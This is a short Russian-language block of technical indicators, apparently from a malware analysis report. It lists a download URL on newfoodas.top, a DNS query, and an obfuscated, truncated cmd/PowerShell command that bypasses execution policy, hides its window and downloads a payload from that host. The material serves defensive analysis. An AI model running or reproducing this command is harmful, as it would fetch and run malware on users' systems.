Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^oWErSHel^L.^eXe -Ex^ecUtI^OnpoL^iC^y byp^A^S^s -^NOPrOf^IL^e^ -^WIndoW^s^tYLE ^H^I^D^den^ ^(ne^W^-Ob^j^Ect sYst^Em.Net.w^e^B^C^LIE^Nt)^.d^ow^NLOAd^FI^l^e^('http://newfoodas...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /C "p^oWErSHel^L.^eXe -Ex^ecUtI^OnpoL^iC^y byp^A^S^s -^NOPrOf^IL^e^ -^WIndoW^s^tYLE ^H^I^D^den^ ^(ne^W^-Ob^j^Ect sYst^Em.Net.w^e^B^C^LIE^Nt)^.d^ow^NLOAd^FI^l^e^('http://newfoodas...' (со скрытым окном)